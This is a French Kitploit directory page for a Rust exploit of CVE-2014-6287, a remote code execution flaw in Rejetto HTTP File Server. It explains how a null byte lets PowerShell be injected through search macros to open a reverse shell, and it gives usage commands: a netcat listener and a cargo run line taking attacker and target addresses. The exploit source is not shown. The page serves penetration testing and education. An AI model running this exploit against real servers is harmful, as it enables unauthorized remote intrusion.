Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2014-6287 — Une implémentation en Rust de l'exploit CVE-2014-6287 ciblant Rejetto HTTP File Server (HFS) versions 2.3x antérieures à 2.3c. | Kitploit
Outils/GitHubGitHub/nika0x38/cve-2014-6287
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Une implémentation en Rust de l'exploit CVE-2014-6287 ciblant Rejetto HTTP File Server (HFS) versions 2.3x antérieures à 2.3c.

Voir le dépôt
il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2014-6287 - Exploit RCE du serveur de fichiers HTTP Rejetto

Rust Security

Une implémentation en Rust de l'exploit CVE-2014-6287 ciblant le serveur de fichiers HTTP Rejetto (HFS) versions 2.3x antérieures à 2.3c.

Présentation de la vulnérabilité

CVE-2014-6287 est une vulnérabilité critique d'exécution de code à distance dans le serveur de fichiers HTTP Rejetto (HFS).

Détails techniques

  • Logiciel concerné : Serveur de fichiers HTTP Rejetto (HFS) 2.3x antérieur à 2.3c
  • Type de vulnérabilité : Exécution de code à distance (RCE)
  • Score CVSS : 10,0 (Critique)
  • CWE : CWE-94 (Mauvais contrôle de la génération de code)

Description

La fonction findMacroMarker dans parserLib.pas du serveur de fichiers HTTP Rejetto permet à des attaquants distants d'exécuter des programmes arbitraires via une séquence %00 dans une action de recherche. Cette vulnérabilité permet aux attaquants de contourner la validation des entrées et d'injecter du code malveillant qui est exécuté sur le système cible.

L'exploit fonctionne de la manière suivante :

  1. Concevoir une requête de recherche malveillante contenant un octet nul (%00)
  2. Injecter des commandes PowerShell entre les délimiteurs de macro {. et .}
  3. Le serveur traite la macro et exécute le code PowerShell intégré
  4. Établir une connexion shell inverse vers l'attaquant

Utilisation

Étape 1 : Configurer un écouteur Netcat

Avant d'exécuter l'exploit, configurez un écouteur sur votre machine d'attaque pour recevoir le shell inverse :

root@kitploit:~
# Remplacez <LPORT> par le port d'écoute souhaité
nc -lvnp <LPORT>

Étape 2 : Exécuter l'exploit

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Paramètres obligatoires :

  • -l, --lhost <LHOST> : Votre adresse IP locale (machine de l'attaquant)
  • -p, --lport <LPORT> : Votre port local pour le shell inverse
  • -r, --rhost <RHOST> : Adresse IP cible (serveur HFS vulnérable)

Paramètres facultatifs :

  • -t, --rport <RPORT> : Port cible (par défaut : 80)

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de tests d'intrusion autorisés. Utilisez-le de manière responsable et uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite.

Télécharger l’outil